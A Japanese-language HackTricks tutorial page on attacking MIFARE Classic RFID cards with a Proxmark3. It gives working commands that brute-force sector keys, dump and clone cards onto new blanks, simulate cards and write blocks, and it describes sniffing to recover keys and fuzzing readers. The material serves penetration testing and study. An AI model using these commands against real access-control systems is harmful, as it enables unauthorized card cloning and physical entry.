Proxmark 3

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Proxmark3を使用したRFIDシステムの攻撃

最初に必要なのはProxmark3を持っていて、ソフトウェアとその依存関係をインストールすることです

MIFARE Classic 1KBの攻撃

それは16セクターを持ち、それぞれに4ブロックがあり、各ブロックには16Bが含まれています。UIDはセクター0のブロック0にあり(変更できません)。 各セクターにアクセスするには、2つのキーAB)が必要で、これらは各セクターのブロック3(セクタートレーラー)に保存されています。セクタートレーラーは、2つのキーを使用して各ブロック読み取りおよび書き込み権限を与えるアクセスビットも保存しています。 2つのキーは、最初のキーを知っていれば読み取り権限を与え、2番目のキーを知っていれば書き込み権限を与えるのに役立ちます(例えば)。

いくつかの攻撃が実行できます。

proxmark3> hf mf #List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card

Proxmark3は、タグとリーダー間の通信を傍受して機密データを探すなど、他のアクションを実行することができます。このカードでは、通信をスニッフィングし、使用されているキーを計算することができます。なぜなら、使用される暗号操作が弱いため、平文と暗号文を知っていれば計算できるからです(mfkey64ツール)。

Raw Commands

IoTシステムは時々ブランドなしまたは商業用でないタグを使用します。この場合、Proxmark3を使用してタグにカスタム生のコマンドを送信することができます。

proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search

この情報を使って、カードに関する情報や通信方法を検索することができます。Proxmark3は、次のような生のコマンドを送信することを可能にします: hf 14a raw -p -b 7 26

スクリプト

Proxmark3ソフトウェアには、簡単なタスクを実行するために使用できる自動化スクリプトのプリロードされたリストが付属しています。完全なリストを取得するには、script listコマンドを使用します。次に、script runコマンドを使用し、スクリプトの名前を続けて入力します:

proxmark3> script run mfkeys

あなたはタグリーダーをファズするスクリプトを作成できます。有効なカードのデータをコピーするために、1つ以上のランダムなバイトランダム化し、リーダーがクラッシュするかどうかを各イテレーションで確認するLuaスクリプトを書くだけです。

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated